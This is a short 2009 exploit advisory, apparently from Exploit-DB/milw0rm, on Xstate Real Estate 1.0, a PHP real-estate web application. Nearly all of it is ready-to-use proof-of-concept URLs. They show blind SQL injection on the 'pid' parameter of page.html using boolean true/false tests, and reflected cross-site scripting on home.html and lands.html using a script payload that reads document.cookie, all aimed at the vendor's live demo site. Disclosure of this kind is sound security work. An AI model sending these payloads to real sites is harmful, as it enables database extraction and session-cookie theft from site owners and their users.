Xstate Real Estate 1.0 - Blind SQL Injection / Cross-Site Scripting

EDB-ID:

9565


Author:

Moudi

Type:

webapps


Platform:

PHP

Date:

2009-09-01


/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

Xstate Real Estate 1.0 (bSQL/XSS) Multiples Vulnerability

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://www.xstate.org

Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php

*/

[+] Exploit bSQL:

- Vulnerable code in page.html (pid).

- Poc:
  http://127.0.0.1/page.html?pid=[bSQL]

  http://demo.xstate.org/page.html?pid=1 and 1=1 TRUE
  http://demo.xstate.org/page.html?pid=1 and 1=2 FALSE

[+] Exploit XSS:

- Vulnerable code in home.html (/).
- Vulnerable code in lands.html (/d).

- Poc:
  http://127.0.0.1/home.html/[XSS]
  http://127.0.0.1/lands.html/[XSS]

  http://demo.xstate.org/home.html/"><script>alert(document.cookie);</script>
  http://demo.xstate.org/lands.html/"><script>alert(document.cookie);</script>

Note: have somes other xss, tired to do all ^^

# milw0rm.com [2009-09-01]